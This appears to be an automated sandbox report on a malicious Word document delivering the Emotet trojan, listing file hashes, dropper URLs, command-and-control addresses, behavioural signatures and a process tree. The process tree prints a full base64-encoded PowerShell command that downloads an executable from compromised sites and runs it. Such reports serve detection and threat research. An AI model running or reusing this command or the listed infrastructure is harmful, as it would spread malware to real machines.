Analysis

  • max time kernel
    21s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 15:33

General

  • Target

    fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae.doc

  • Size

    168KB

  • MD5

    19d28177f751a82727b953ead1233de1

  • SHA1

    3e0d77ed9978c582ad1b3bdb5aa1213638b27abe

  • SHA256

    fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae

  • SHA512

    1951217d0e1d967f1e77f0145c3a08cbbf483298e79f2ee8b6b6a4db2d18d208bd4e7b84d08c7e541a1a49fbfb3cc881991cbd9e1cf23803ddb865d0bef4acaf

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://artexproductions.com/cgi-bin/xHdbmk/

exe.dropper

http://whistledownfarm.com/cgi-bin/tlsjw81/

exe.dropper

http://e-motiva.com/wp-admin/bFr531220/

exe.dropper

http://stolkie.net/m/H0LV59574/

exe.dropper

http://www.faccomputer.com/images/5mMAg7bKKK/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1420
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFcARwBGAE0AUQByAHkAcQAgAD0AIAAnADIANwAzACcAOwAkAE0AQQBBAEkARQB6AHUAaAA9ACcASQBVAFgAWgBDAHAAbgB1ACcAOwAkAEQAWQBPAEUAQQBoAGMAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwBHAEYATQBRAHIAeQBxACsAJwAuAGUAeABlACcAOwAkAEIATABNAFQASQBjAGgAcAA9ACcAQgBHAFMAWABIAGsAYwBlACcAOwAkAEEAUQBXAEUAUQB4AG0AZgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AGUAQgBjAEwAaQBlAE4AdAA7ACQAUQBBAEkATABXAGcAcQBuAD0AJwBoAHQAdABwADoALwAvAGEAcgB0AGUAeABwAHIAbwBkAHUAYwB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB4AEgAZABiAG0AawAvACoAaAB0AHQAcAA6AC8ALwB3AGgAaQBzAHQAbABlAGQAbwB3AG4AZgBhAHIAbQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHQAbABzAGoAdwA4ADEALwAqAGgAdAB0AHAAOgAvAC8AZQAtAG0AbwB0AGkAdgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiAEYAcgA1ADMAMQAyADIAMAAvACoAaAB0AHQAcAA6AC8ALwBzAHQAbwBsAGsAaQBlAC4AbgBlAHQALwBtAC8ASAAwAEwAVgA1ADkANQA3ADQALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBmAGEAYwBjAG8AbQBwAHUAdABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8ANQBtAE0AQQBnADcAYgBLAEsASwAvACcALgAiAFMAUABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQBBAEIAQwBTAHUAcwBpAD0AJwBZAEQAVABGAE0AcwBtAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYASwBPAFgAVABiAGUAZAAgAGkAbgAgACQAUQBBAEkATABXAGcAcQBuACkAewB0AHIAeQB7ACQAQQBRAFcARQBRAHgAbQBmAC4AIgBkAGAAbwB3AE4AbABPAEEAZABGAGAAaQBgAGwARQAiACgAJABWAEsATwBYAFQAYgBlAGQALAAgACQARABZAE8ARQBBAGgAYwBzACkAOwAkAEkAUwBSAFkAQgBvAHAAdAA9ACcAWgBMAE0ATQBXAHkAZAB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABZAE8ARQBBAGgAYwBzACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBlAGEAVABFACIAKAAkAEQAWQBPAEUAQQBoAGMAcwApADsAJABZAFMAUwBCAEEAcQBqAG0APQAnAFYAVABBAEwAWgBvAHUAbAAnADsAYgByAGUAYQBrADsAJABTAFkATgBOAFoAdABzAHgAPQAnAEwARwBVAEIAUQB5AGwAagAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAFEAUQBIAFMAYgB5AHgAPQAnAFkAWgBOAFkAQwBuAGoAZAAnAA==
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    PID:1528
  • C:\Users\Admin\273.exe
    C:\Users\Admin\273.exe
    1⤵
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:1880
    • C:\Windows\SysWOW64\WinSCard\cmstplua.exe
      "C:\Windows\SysWOW64\WinSCard\cmstplua.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1604

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\273.exe

  • C:\Users\Admin\273.exe

  • C:\Windows\SysWOW64\WinSCard\cmstplua.exe

  • memory/1420-2-0x0000000008960000-0x0000000008964000-memory.dmp

    Filesize

    16KB

  • memory/1420-4-0x0000000007070000-0x0000000007270000-memory.dmp

    Filesize

    2.0MB

  • memory/1420-5-0x000000000ADF0000-0x000000000ADF4000-memory.dmp

    Filesize

    16KB

  • memory/1420-6-0x000000000BE70000-0x000000000BE74000-memory.dmp

    Filesize

    16KB

  • memory/1604-12-0x0000000000000000-mapping.dmp

  • memory/1604-14-0x0000000000200000-0x000000000020C000-memory.dmp

    Filesize

    48KB

  • memory/1880-11-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB